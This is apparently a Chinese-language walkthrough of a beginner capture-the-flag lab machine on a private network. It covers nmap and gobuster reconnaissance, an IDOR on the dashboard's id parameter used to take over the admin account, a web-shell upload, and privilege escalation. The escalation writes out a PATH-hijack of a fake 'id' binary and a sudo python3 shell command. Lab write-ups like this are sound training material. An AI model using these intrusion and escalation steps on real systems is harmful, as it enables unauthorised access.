描述
Difficulty: Easy
It’s a box for beginners, but not easy, Good Luck
Hint: Don’t waste your time For Brute-Force
nmap 扫描

1 2
| kali 192.168.169.220 靶机 192.168.169.232
|
nmap扫描靶机

访问80


目录爆破
1
| gobuster dir -u http://192.168.169.232/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
|

功能点测试


1 2 3
| 用其他名字成功注册并登录
http://192.168.169.232/dashboard.php?id=2
|

1 2 3
| 又注册一个账号
http://192.168.169.232/dashboard.php?id=3
|
1 2 3 4 5
| 注意链接的id字段
自己注册的id是2和3 admin被占用 admin的id可能是1
|
越权



1
| 用户名admin的密码被修改为222222 登录成功
|
上传shell





成功连接
1
| python3 -c 'import pty;pty.spawn("/bin/bash")'
|
提权




- 二进制文件是 id 的副本,它以用户 john 的身份执行,那可以创建一个具有相同名称的自定义二进制文件将目录导出到 PATH:
1
| echo 'bash' > /tmp/id; chmod +x /tmp/id; export PATH=/tmp:$PATH
|
- 查看password文件得到密码 root123
- 切换用户john
- 写入shell
1
| echo 'import os;os.system("/bin/bash")' > file.py
|
1
| sudo python3 /home/john/file.py
|

